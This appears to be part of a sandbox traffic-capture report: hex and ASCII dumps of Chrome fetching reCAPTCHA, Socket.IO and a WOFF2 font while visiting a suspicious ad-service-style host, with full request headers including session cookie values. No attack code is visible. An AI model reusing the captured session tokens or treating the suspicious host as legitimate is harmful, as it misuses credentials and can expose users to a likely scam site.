                                                                                                                                      Data Ascii: -WgQa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=W
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 86 8a fb 19 1b 9a 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc 92 41
                                                                                                                                      Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2A
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 43 69 8b 41 c0 80 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70 3c ba 84 97 64 67 4b 73 47 73 22 75 e1 a6 a3 95 79 c9 7d 3a f9 6e a4 ea 9e bf 47 78 1c db ef 7d 70 0e 4a d9 66 b0 6f fb 0a db de d6 5b 5f a7 6d 6d aa e6 3b 4c 81 04 ba 0d be 91 ce 1f e7 b8 cc ce 72 36 ce 9f f8 4b 3e f6 63 d0 39 da 99 e1 24 58 ef ad ce 1d 15 87 68 95 9d 29 d7 2d 75 09 b7 74 bd 2b 99 86 a9 ef 3b 52 06 06 93 98 67 80 17 a1
                                                                                                                                      Data Ascii: CiAT;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p<dgKsGs"uy}:nGx}pJfo[_mm;Lr6K>c9$Xh)-ut+;Rg


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      39192.168.2.1649759142.250.69.1964435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC741OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:48 UTC528INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                      Expires: Wed, 08 May 2024 18:12:48 GMT
                                                                                                                                      Date: Wed, 08 May 2024 18:12:48 GMT
                                                                                                                                      Cache-Control: private, max-age=300
                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      Server: GSE
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Accept-Ranges: none
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Connection: close
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      2024-05-08 18:12:48 UTC727INData Raw: 34 63 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                      Data Ascii: 4c6/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                      2024-05-08 18:12:48 UTC502INData Raw: 63 47 6c 79 65 53 49 36 4d 54 63 79 4e 54 51 77 4e 7a 6b 35 4f 53 77 69 61 58 4e 54 64 57 4a 6b 62 32 31 68 61 57 34 69 4f 6e 52 79 64 57 55 73 49 6d 6c 7a 56 47 68 70 63 6d 52 51 59 58 4a 30 65 53 49 36 64 48 4a 31 5a 58 30 3d 27 3b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 56 36 5f 38 35 71 70 63 32 58 66 32 73 62 65 33 78 54 6e 52 74 65 37 6d 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73 4f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 3b 70 6f 2e 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 30 6c 4a 6b 4f 56 48 44 79 33 49 74 59 6c 43 62 55
                                                                                                                                      Data Ascii: cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-0lJkOVHDy3ItYlCbU
                                                                                                                                      2024-05-08 18:12:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      40192.168.2.164976099.86.38.1034435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC653OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                                                                                                      Host: cdn.socket.io
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:48 UTC702INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                      Content-Length: 45806
                                                                                                                                      Connection: close
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                                                                      Content-Disposition: inline; filename="socket.io.min.js"
                                                                                                                                      Date: Fri, 19 Apr 2024 23:47:23 GMT
                                                                                                                                      ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                                                                                                      Server: Vercel
                                                                                                                                      Strict-Transport-Security: max-age=63072000
                                                                                                                                      X-Vercel-Cache: HIT
                                                                                                                                      X-Vercel-Id: pdx1::r8gft-1713570443288-a687dd7290b7
                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                      Via: 1.1 2e20768704c71ff3ce2e677251d27f3c.cloudfront.net (CloudFront)
                                                                                                                                      X-Amz-Cf-Pop: SEA19-C1
                                                                                                                                      X-Amz-Cf-Id: bjwvr8hivioQQviX4h4uYS_GRjLsEtSQCle9Qoj0j2-E3nhAY4JdkQ==
                                                                                                                                      Age: 1621525
                                                                                                                                      2024-05-08 18:12:48 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                                                                      Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                                                                                                      2024-05-08 18:12:48 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                                                                                                      Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                                                                                                      2024-05-08 18:12:48 UTC12004INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                                                                                                      Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th
                                                                                                                                      2024-05-08 18:12:48 UTC1034INData Raw: 65 2c 65 3d 76 6f 69 64 20 30 29 3b 76 61 72 20 72 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 76 6f 69 64 20 30 2c 72 3d 74 3b 6e 3d 6e 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6c 6f 63 61 74 69 6f 6e 26 26 6c 6f 63 61 74 69 6f 6e 2c 6e 75 6c 6c 3d 3d 74 26 26 28 74 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 22 2f 22 3d 3d 3d 74 2e 63 68 61 72 41
                                                                                                                                      Data Ascii: e,e=void 0);var r,i=function(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"",n=arguments.length>2?arguments[2]:void 0,r=t;n=n||"undefined"!=typeof location&&location,null==t&&(t=n.protocol+"//"+n.host),"string"==typeof t&&("/"===t.charA


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      41192.168.2.1649761104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:49 UTC1534OUTGET /89hjocAARSebIS27gFLCdefRWidDS8kUab76 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:50 UTC633INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:50 GMT
                                                                                                                                      Content-Type: font/woff2
                                                                                                                                      Content-Length: 43596
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="89hjocAARSebIS27gFLCdefRWidDS8kUab76"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zkELvPAPRC3K5lyfS2dBbKhpfP2Uen2Npk%2B1RidvfeVR7HdWOtHuy5Hh2sAxT%2BWByITsx0nrpyDI43rsZXxQucqBgo%2BBvvNGnm1qPWXCNL3effch%2FLdlqZhFcMtcpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b91fd9ca3ad-SEA
                                                                                                                                      2024-05-08 18:12:50 UTC736INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                                                                                                      Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: ec bf 1e 69 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca b1 b7 78 26 40 a1 1f 8f 68 a8 37 83
                                                                                                                                      Data Ascii: iD} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAVx&@h7
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: b6 3e d8 2e 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1 fc fb 48 b3 d9 1f 86 2f e5 9b 9b b5
                                                                                                                                      Data Ascii: >.m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7H/
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 25 ab 11 e4 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb eb d8 5e de eb 78 af d8 0e f9 43 a9
                                                                                                                                      Data Ascii: %D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI^xC
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 5e 26 60 bf a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba ed 90 63 7c a6 8b 45 e2 fa ee ae 6f
                                                                                                                                      Data Ascii: ^&`[Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYWc|Eo
